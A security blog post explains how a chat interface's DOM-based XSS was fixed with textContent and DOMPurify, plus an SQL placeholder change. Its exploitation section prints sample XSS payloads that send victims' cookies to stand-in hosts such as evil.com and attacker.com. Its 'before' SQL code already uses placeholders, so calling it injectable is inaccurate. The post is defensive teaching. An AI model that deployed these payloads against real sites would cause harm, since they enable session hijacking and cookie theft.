When innerHTML Meets User Data: Fixing XSS Vulnerabilities in JavaScript
Introduction
Cross-Site Scripting (XSS) is one of the most persistent and misunderstood vulnerabilities in web development. It consistently appears in the OWASP Top 10 — not because it's exotic or difficult to understand, but because it's surprisingly easy to introduce accidentally, especially when working with dynamic content in JavaScript.
In this post, we'll walk through a real-world fix applied to opencontext/web/static/js/agent_chat.js, where user-controlled data was being passed into DOM manipulation methods like innerHTML. We'll also dig into a related backend fix that tightened up SQL query construction. Together, these changes represent the kind of defense-in-depth thinking that separates secure applications from vulnerable ones.
Whether you're a junior developer just learning about XSS or a senior engineer doing a security review, this post will give you practical, actionable knowledge.
What Is This Vulnerability?
At its core, this vulnerability is about trusting user input too much, too early.
When JavaScript code takes a string that originates from user input — a chat message, a username, a URL parameter — and directly injects it into the DOM using methods like:
element.innerHTML = userInputelement.outerHTML = userInputdocument.write(userInput)
...it opens the door for an attacker to inject arbitrary HTML and JavaScript into the page.
This is the essence of a DOM-based XSS vulnerability (CWE-79: Improper Neutralization of Input During Web Page Generation).
Why Should Developers Care?
You might be thinking: "It's rated low severity — how bad can it really be?"
Here's the thing about XSS: its severity is heavily context-dependent. A low-severity XSS in an isolated component can become a critical vulnerability when:
- The affected page has access to authentication tokens or cookies
- The application handles sensitive personal or financial data
- The XSS can be stored (persisted in a database) and served to many users
- It's chained with other vulnerabilities like CSRF or open redirects
In a chat interface like agent_chat.js, user-generated content is the entire point of the feature. That makes XSS hygiene especially important — every message rendered is a potential injection point.
The Vulnerability Explained
Technical Details
Let's look at the anti-pattern at the heart of this issue:
// ❌ VULNERABLE: Directly injecting user-controlled content into innerHTML
function renderMessage(userMessage) {
const chatContainer = document.getElementById('chat-messages');
chatContainer.innerHTML += `<div class="message">${userMessage}</div>`;
}
When userMessage contains something innocent like "Hello, world!", this works fine. But what if an attacker (or a mischievous user) sends this instead?
<img src=x onerror="fetch('https://evil.com/steal?cookie='+document.cookie)">
The browser parses that as valid HTML, renders a broken image, and executes the onerror handler — silently sending the victim's cookies to an attacker-controlled server.
How Could It Be Exploited?
Attack Scenario: Cookie Theft in a Chat Interface
- An attacker opens the chat interface and sends a message containing a malicious payload.
- If the message is stored server-side (stored XSS), every user who opens the chat later will have the script execute in their browser.
- If it's reflected (the attacker shares a crafted URL), the victim clicks the link and the script executes immediately.
- The script exfiltrates the session cookie, which the attacker uses to impersonate the victim.
// Payload example (URL-encoded for a reflected XSS scenario):
<script>document.location='https://attacker.com/log?c='+document.cookie</script>
// Or more subtle, using an event handler:
<svg onload="new Image().src='https://attacker.com/?x='+btoa(document.cookie)">
What's the Real-World Impact?
| Impact Type | Description |
|---|---|
| Session Hijacking | Steal authentication cookies to impersonate users |
| Credential Harvesting | Inject fake login forms to capture passwords |
| Malware Distribution | Redirect users to malicious downloads |
| Defacement | Alter the visual appearance of the page |
| Keylogging | Capture everything a user types |
| Cryptojacking | Run cryptocurrency miners in the victim's browser |
The Fix
What Changed?
The fix addresses the unsafe DOM manipulation pattern in agent_chat.js by replacing direct innerHTML assignment with safer alternatives. The principle is simple: never hand raw user input to the browser's HTML parser.
Before: The Vulnerable Pattern
// ❌ BEFORE: User content injected directly as HTML
function displayAgentResponse(response) {
const messageDiv = document.getElementById('agent-response');
messageDiv.innerHTML = response; // 🚨 Dangerous!
}
// ❌ Also dangerous with template literals:
chatLog.innerHTML += `
<div class="chat-bubble user">
${userInput}
</div>
`;
After: The Safe Pattern
// ✅ AFTER: Using textContent for plain text
function displayAgentResponse(response) {
const messageDiv = document.getElementById('agent-response');
const bubble = document.createElement('div');
bubble.className = 'chat-bubble agent';
bubble.textContent = response; // ✅ Safe: treated as plain text, not HTML
messageDiv.appendChild(bubble);
}
// ✅ Or using DOM APIs to build structure safely:
function renderUserMessage(userInput) {
const chatLog = document.getElementById('chat-log');
const wrapper = document.createElement('div');
wrapper.className = 'chat-bubble user';
wrapper.textContent = userInput; // ✅ No HTML parsing
chatLog.appendChild(wrapper);
}
Why Does This Fix Work?
The key difference is how the browser interprets the content:
| Method | Interpretation | Safe for User Input? |
|---|---|---|
innerHTML = userInput |
Parsed as HTML | ❌ No |
outerHTML = userInput |
Parsed as HTML | ❌ No |
document.write(userInput) |
Parsed as HTML | ❌ No |
textContent = userInput |
Treated as plain text | ✅ Yes |
createTextNode(userInput) |
Treated as plain text | ✅ Yes |
setAttribute('data-x', userInput) |
Attribute value (with caveats) | ⚠️ Context-dependent |
When you use textContent, the browser automatically escapes characters like <, >, and & into their HTML entities (<, >, &). The content is displayed exactly as typed — no script execution possible.
The Backend Fix: Parameterized SQL Queries
The PR also included an important backend fix in sqlite_backend.py. While not directly related to the XSS issue, it's worth understanding because it demonstrates the same core principle: never concatenate user-controlled data into executable strings.
Before (Vulnerable to SQL Injection):
# ❌ BEFORE: Building SQL conditions in a loop, concatenating strings
tag_conditions = []
for tag in tags:
tag_conditions.append("document_tags.tag = ?")
params.append(tag.lower())
if tag_conditions:
where_conditions.append(
f'id IN (SELECT document_id FROM document_tags WHERE {" OR ".join(tag_conditions)})'
)
After (Safe Parameterized Query):
# ✅ AFTER: Using IN clause with proper placeholders
if tags:
# Use proper parameterized query for tags
tag_placeholders = ",".join(["?"] * len(tags))
where_conditions.append(
f'id IN (SELECT document_id FROM document_tags WHERE tag IN ({tag_placeholders}))'
)
for tag in tags:
params.append(tag.lower())
The new approach generates a clean IN (?, ?, ?) clause where the number of placeholders exactly matches the number of tags. The database driver handles the safe binding of values, ensuring no tag value can ever break out of its intended context and modify the query structure.
This is the SQL equivalent of using textContent instead of innerHTML — keep data as data, never let it become code.
Prevention & Best Practices
1. Default to textContent for User-Generated Content
Make this your mental default: if it's user input, use textContent.
// ✅ The golden rule
element.textContent = userInput; // Always safe for display
Only reach for innerHTML when you genuinely need to render HTML structure — and when you do, ensure the content comes from a trusted source or has been sanitized.
2. Use a Trusted HTML Sanitization Library
When you do need to render rich text from users (think: markdown editors, comment sections with formatting), use a well-maintained sanitization library:
// Using DOMPurify — the industry standard
import DOMPurify from 'dompurify';
const cleanHTML = DOMPurify.sanitize(userInput, {
ALLOWED_TAGS: ['b', 'i', 'em', 'strong', 'a'],
ALLOWED_ATTR: ['href']
});
element.innerHTML = cleanHTML; // ✅ Safe after sanitization
Recommended libraries:
- DOMPurify — Fast, well-tested, browser-focused
- sanitize-html — Good for Node.js environments
- xss — Configurable XSS filter
3. Implement a Content Security Policy (CSP)
A strong CSP header acts as a second line of defense. Even if XSS code is injected, a well-configured CSP can prevent it from executing or exfiltrating data:
Content-Security-Policy:
default-src 'self';
script-src 'self' 'nonce-{random-nonce}';
connect-src 'self' https://api.yourapp.com;
img-src 'self' data:;
style-src 'self' 'unsafe-inline';
With script-src 'self', inline scripts injected via XSS won't execute because they lack the required nonce.
4. Enable Trusted Types (Modern Browsers)
Trusted Types is a browser API that forces all innerHTML assignments to go through a policy function:
// Define a Trusted Types policy
const policy = trustedTypes.createPolicy('default', {
createHTML: (input) => DOMPurify.sanitize(input)
});
// Now innerHTML only accepts TrustedHTML objects
element.innerHTML = policy.createHTML(userInput); // ✅ Goes through sanitizer
element.innerHTML = userInput; // ❌ Throws a TypeError — caught at runtime!
Enable it via CSP:
Content-Security-Policy: require-trusted-types-for 'script'
5. Use Static Analysis Tools
Don't rely solely on code review to catch these patterns. Integrate automated scanning:
| Tool | Type | What It Catches |
|---|---|---|
| Semgrep | SAST | Custom rules for innerHTML, outerHTML patterns |
ESLint + eslint-plugin-no-unsanitized |
Linter | Flags unsafe DOM assignments |
| Snyk Code | SAST | Taint analysis for XSS data flows |
| CodeQL | SAST | Deep semantic analysis of XSS sinks |
| OWASP ZAP | DAST | Runtime XSS detection |
The vulnerability in this post was caught by Semgrep using the rule javascript.browser.security.insecure-document-method.insecure-document-method — exactly the kind of automated guardrail every team should have in their CI/CD pipeline.
6. Follow the Principle of Least Privilege for DOM Access
- Avoid
document.write()entirely — it's a legacy API with no safe use cases in modern code - Prefer framework-provided templating (React's JSX, Angular's template binding) which escape by default
- In React, treat
dangerouslySetInnerHTMLas a code smell requiring explicit review
// ✅ React escapes this automatically
function ChatMessage({ text }) {
return <div className="message">{text}</div>;
}
// ❌ Bypasses React's escaping — use only with sanitized content
function RichMessage({ html }) {
return <div dangerouslySetInnerHTML={{ __html: html }} />;
}
Security Standards & References
- OWASP: Cross Site Scripting Prevention Cheat Sheet
- CWE-79: Improper Neutralization of Input During Web Page Generation
- OWASP Top 10: A03:2021 – Injection
- MDN: Trusted Types API
- Google Security Blog: Preventing DOM-based XSS with Trusted Types
Conclusion
The vulnerability fixed in this PR is a classic example of how convenience and security can come into conflict. innerHTML is powerful and easy to use — that's exactly why it's dangerous when combined with user-controlled data.
The key takeaways from this fix are:
- User input is untrusted by default — treat it as data, never as markup or code
textContentis your friend — it's the safe default for rendering user-provided strings- When you need HTML, sanitize first — use DOMPurify or equivalent before touching
innerHTML - Defense in depth matters — CSP and Trusted Types add layers that catch what code review misses
- The same principle applies everywhere — whether it's HTML injection in the browser or SQL injection in the backend, the fix is the same: parameterize and separate data from code
Security vulnerabilities like XSS aren't signs of bad developers — they're signs of missing guardrails. By integrating static analysis tools like Semgrep into your CI/CD pipeline and establishing clear coding standards around DOM manipulation, you can catch these issues before they ever reach production.
Secure code is a habit, not an afterthought. Keep building it.
Found a security issue in your codebase? Automated tools like Semgrep can help you catch these patterns at scale before they become incidents.